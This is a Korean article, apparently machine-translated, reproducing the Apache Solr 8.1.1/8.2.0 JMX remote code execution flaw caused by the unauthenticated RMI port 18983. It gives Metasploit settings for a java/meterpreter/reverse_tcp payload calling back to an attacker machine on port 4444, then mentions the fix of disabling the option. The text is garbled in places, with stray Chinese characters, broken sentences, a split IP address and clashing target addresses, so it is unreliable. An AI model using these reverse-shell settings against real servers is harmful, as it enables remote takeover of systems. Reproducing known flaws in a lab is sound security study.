Solr는 웹 서비스와 유사한 API 인터페이스를 제공하는 독립된 기업용 검색 애플리케이션 서버입니다. 사용자는 http 요청을 통해 특정 형식의 XML 파일을 검색 엔진 서버에 제출하여 인덱스를 생성할 수 있으며, Http Get 작업을 통해 검색 요청을 하고 XML 형식으로 반환된 결과를 얻을 수도 있습니다.
이 취약점은 기본 구성 파일 solr.in.sh의 ENABLE_REMOTE_JMX_OPTS 구성 옵션의 보안 위험으로 인해 발생합니다.
ENABLE_REMOTE_JMX_OPTS="true" 옵션은 Apache Solr 버전 8.1.1 및 8.2.0의 내장 구성 파일 solr.in.sh에 있습니다.
해당 버전의 기본 solr.in.sh 파일을 사용하는 경우 JMX 모니터링이 활성화되고 RMI_PORT(기본값 = 18983),
에 노출되며 인증이 필요하지 않습니다. 방화벽에서 인바운드 트래픽을 위해 이 포트가 열려 있으면 Solr 노드에 대한 네트워크 액세스 권한이 있는 사람은 누구나 JMX에 액세스할 수 있으며
Solr 서버에서 실행될 악성 코드를 업로드할 수 있습니다. 이 취약점은 Windows 시스템 사용자에게는 영향을 미치지 않으며 일부 Linux 버전 사용자에게만 영향을 미칩니다.本0x01 Impact 버전 0apache Solr8.1.1 version Line time : 2019-05-28
피해자가 이용되면 피해자는 이 기본 구성이 구성되면 JMX 서비스는 기본 포트 18983에서 열리고 기본적으로 인증이 활성화되지 않습니다. 이 포트에 액세스할 수 있는 모든 공격자는 이 취약점을 악용하여 영향을 받는 서비스에 대한 공격을 시작하고 임의 코드를 실행할 수 있습니다.
Java 환경과 kali 시스템, Solr 8.20
을 시작합니다.
시작 후 액세스 :http://192.168.10.176:8983/0x04 취약점 재발
공격 머신: kali IP: 192.168.10.147
Ø set RHOST 192.168.10.184
Ø set RPORT 18983
페이로드 설정: java/meterpreter/reverse_tcpØ set 페이로드 java/meterpreter/reverse_tcpØ 설정 LHOST 192.16 8.10. 147 Ø 설정 LPORT 4444
3을 사용하여 실행되면 연결이 성공적으로 설정되어 있음을 알 수 있습니다. .sh 구성 파일을 false로 설정한 다음 Solr 서비스를 다시 시작합니다.위 내용은 Apache Solr JMX 서비스에서 RCE 취약점을 재현하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!